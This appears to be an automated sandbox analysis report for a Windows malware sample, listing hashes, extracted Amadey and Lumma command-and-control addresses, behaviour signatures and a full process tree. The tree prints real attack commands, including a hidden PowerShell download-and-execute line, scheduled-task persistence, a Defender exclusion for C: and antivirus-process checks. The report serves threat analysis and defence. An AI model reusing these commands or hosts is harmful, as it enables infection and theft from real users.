Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/03/2025, 15:31

General

  • Target

    2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    0eccd198d1939a692bfbbca2e75a1436

  • SHA1

    4894a93b07e69384048f89d1a4ad61b3c5361698

  • SHA256

    11e2553db5e3f1868caa79232974ad747e2e2ee600163b7e9234348dbd7e07a0

  • SHA512

    fa8a571fed524e28501684d067a0e4243112b17a796c8a8ce5b26949682d019412256e435676e7c49ddbf432912b30a57557919b06c6b5854acff13ac8d2835d

  • SSDEEP

    24576:2qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ku:2TvC/MTQYxsWR7a0K

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://grodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://cspacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 15 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

  • Sets service image path in registry 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 36 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2964
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2636
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:5724
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:6676
    • C:\Users\Admin\AppData\Local\Temp\2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn JNtBRmaeHMD /tr "mshta C:\Users\Admin\AppData\Local\Temp\2oMN1S9pZ.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2876
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn JNtBRmaeHMD /tr "mshta C:\Users\Admin\AppData\Local\Temp\2oMN1S9pZ.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4244
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\2oMN1S9pZ.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:740
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3472
          • C:\Users\Admin\AppData\Local\TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE
            "C:\Users\Admin\AppData\Local\TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4988
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3060
              • C:\Users\Admin\AppData\Local\Temp\10395570101\1Hoz3Kt.exe
                "C:\Users\Admin\AppData\Local\Temp\10395570101\1Hoz3Kt.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5956
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  7⤵
                    PID:5840
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    7⤵
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3016
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:3020
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    7⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • System Location Discovery: System Language Discovery
                    PID:2068
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 488
                      8⤵
                      • Program crash
                      PID:1404
                • C:\Users\Admin\AppData\Local\Temp\10395640101\ZzvSz9G.exe
                  "C:\Users\Admin\AppData\Local\Temp\10395640101\ZzvSz9G.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:2608
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                    • Drops startup file
                    • Adds Run key to start application
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3084
                    • C:\Windows\SysWOW64\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "MSBuild" /tr "C:\Users\Admin\AppData\Roaming\MSBuild.exe"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:5720
                • C:\Users\Admin\AppData\Local\Temp\10395660101\6b0cf60590.exe
                  "C:\Users\Admin\AppData\Local\Temp\10395660101\6b0cf60590.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:5836
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10395660101\6b0cf60590.exe"
                    7⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:5008
                • C:\Users\Admin\AppData\Local\Temp\10395670101\ef0c5b42b9.exe
                  "C:\Users\Admin\AppData\Local\Temp\10395670101\ef0c5b42b9.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3736
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10395670101\ef0c5b42b9.exe"
                    7⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:4900
                • C:\Users\Admin\AppData\Local\Temp\10395680101\ZzvSz9G.exe
                  "C:\Users\Admin\AppData\Local\Temp\10395680101\ZzvSz9G.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:4272
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                      PID:3752
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2444
                  • C:\Users\Admin\AppData\Local\Temp\10395690101\1Hoz3Kt.exe
                    "C:\Users\Admin\AppData\Local\Temp\10395690101\1Hoz3Kt.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1088
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      7⤵
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1572
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:5536
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      7⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • System Location Discovery: System Language Discovery
                      PID:5508
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 500
                        8⤵
                        • Program crash
                        PID:6800
                  • C:\Users\Admin\AppData\Local\Temp\10395700101\699c61c575.exe
                    "C:\Users\Admin\AppData\Local\Temp\10395700101\699c61c575.exe"
                    6⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • System Location Discovery: System Language Discovery
                    PID:1188
                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exe
                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exe
                      7⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5652
                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x9762.exe
                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x9762.exe
                      7⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1028
                  • C:\Users\Admin\AppData\Local\Temp\10395710101\gLLOqKC.exe
                    "C:\Users\Admin\AppData\Local\Temp\10395710101\gLLOqKC.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:5440
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4704
                  • C:\Users\Admin\AppData\Local\Temp\10395730101\nAM5wkr.exe
                    "C:\Users\Admin\AppData\Local\Temp\10395730101\nAM5wkr.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1700
                    • C:\Windows\SYSTEM32\CMD.exe
                      "CMD" netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" WindowsControl ENABLE & exit
                      7⤵
                        PID:1400
                      • C:\Windows\SYSTEM32\cmd.exe
                        "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST & exit
                        7⤵
                          PID:5080
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST
                            8⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:5940
                        • C:\Windows\SYSTEM32\cmd.exe
                          "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST & exit
                          7⤵
                            PID:2460
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST
                              8⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:5884
                          • C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
                            "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3212
                        • C:\Users\Admin\AppData\Local\Temp\10395740101\TbV75ZR.exe
                          "C:\Users\Admin\AppData\Local\Temp\10395740101\TbV75ZR.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:3400
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            7⤵
                              PID:4588
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                              7⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • System Location Discovery: System Language Discovery
                              PID:4160
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 496
                                8⤵
                                • Program crash
                                PID:4604
                          • C:\Users\Admin\AppData\Local\Temp\10395750101\z85yd_003.exe
                            "C:\Users\Admin\AppData\Local\Temp\10395750101\z85yd_003.exe"
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: MapViewOfSection
                            PID:4796
                            • C:\Windows\SYSTEM32\cmd.exe
                              cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                              7⤵
                                PID:4596
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Loads dropped DLL
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3736
                              • C:\Windows\system32\svchost.exe
                                "C:\Windows\system32\svchost.exe"
                                7⤵
                                • Downloads MZ/PE file
                                • Loads dropped DLL
                                • Adds Run key to start application
                                PID:1884
                                • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                  "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                  8⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:5460
                                • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                  "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                  8⤵
                                  • Deletes itself
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:1524
                                  • C:\Users\Admin\AppData\Local\Temp\{70d6de0e-7607-4c5a-9fab-69928d000bb7}\ff6422e.exe
                                    "C:\Users\Admin\AppData\Local\Temp\{70d6de0e-7607-4c5a-9fab-69928d000bb7}\ff6422e.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                    9⤵
                                    • Executes dropped EXE
                                    • Checks for VirtualBox DLLs, possible anti-VM trick
                                    • System Location Discovery: System Language Discovery
                                    PID:11416
                                    • C:\Users\Admin\AppData\Local\Temp\{39fe345b-9f35-40dc-b69c-2774bd405002}\bf02fd08.exe
                                      C:/Users/Admin/AppData/Local/Temp/{39fe345b-9f35-40dc-b69c-2774bd405002}/\bf02fd08.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                      10⤵
                                      • Drops file in Drivers directory
                                      • Sets service image path in registry
                                      • Executes dropped EXE
                                      • Impair Defenses: Safe Mode Boot
                                      • Loads dropped DLL
                                      • Adds Run key to start application
                                      • Writes to the Master Boot Record (MBR)
                                      • Checks for VirtualBox DLLs, possible anti-VM trick
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: LoadsDriver
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:12232
                            • C:\Users\Admin\AppData\Local\Temp\10395760101\EPTwCQd.exe
                              "C:\Users\Admin\AppData\Local\Temp\10395760101\EPTwCQd.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:5060
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                7⤵
                                  PID:2828
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4016
                              • C:\Users\Admin\AppData\Local\Temp\10395770101\SPOKz5U.exe
                                "C:\Users\Admin\AppData\Local\Temp\10395770101\SPOKz5U.exe"
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:1048
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3424
                              • C:\Users\Admin\AppData\Local\Temp\10395790101\7IIl2eE.exe
                                "C:\Users\Admin\AppData\Local\Temp\10395790101\7IIl2eE.exe"
                                6⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:13180
                                • C:\Windows\SysWOW64\CMD.exe
                                  "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:13264
                                  • C:\Windows\SysWOW64\tasklist.exe
                                    tasklist
                                    8⤵
                                    • Enumerates processes with tasklist
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:9740
                                  • C:\Windows\SysWOW64\findstr.exe
                                    findstr /I "opssvc wrsa"
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:9776
                                  • C:\Windows\SysWOW64\tasklist.exe
                                    tasklist
                                    8⤵
                                    • Enumerates processes with tasklist
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:9992
                                  • C:\Windows\SysWOW64\findstr.exe
                                    findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2104
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c md 418377
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:10148
                                  • C:\Windows\SysWOW64\extrac32.exe
                                    extrac32 /Y /E Leon.cab
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:10220
                                  • C:\Windows\SysWOW64\findstr.exe
                                    findstr /V "BEVERAGES" Compilation
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:10616
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:10732
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:10920
                                  • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                    Passwords.com N
                                    8⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:11048
                                  • C:\Windows\SysWOW64\choice.exe
                                    choice /d y /t 5
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:11280
                              • C:\Users\Admin\AppData\Local\Temp\10395800101\ba223baae3.exe
                                "C:\Users\Admin\AppData\Local\Temp\10395800101\ba223baae3.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                PID:8036
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5832
                              • C:\Users\Admin\AppData\Local\Temp\10395810101\8e41b6c338.exe
                                "C:\Users\Admin\AppData\Local\Temp\10395810101\8e41b6c338.exe"
                                6⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:12736
                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2012
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\MSBuild.exe
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2184
                      • C:\Users\Admin\AppData\Roaming\MSBuild.exe
                        C:\Users\Admin\AppData\Roaming\MSBuild.exe
                        2⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1816
                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1632
                    • C:\Users\Admin\AppData\Roaming\MSBuild.exe
                      C:\Users\Admin\AppData\Roaming\MSBuild.exe
                      1⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:5844
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                      1⤵
                        PID:2572
                        • C:\Windows\system32\rundll32.exe
                          rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                          2⤵
                            PID:6008
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2068 -ip 2068
                          1⤵
                            PID:8
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4160 -ip 4160
                            1⤵
                              PID:3432
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                              1⤵
                                PID:4856
                              • C:\Windows\system32\cmd.exe
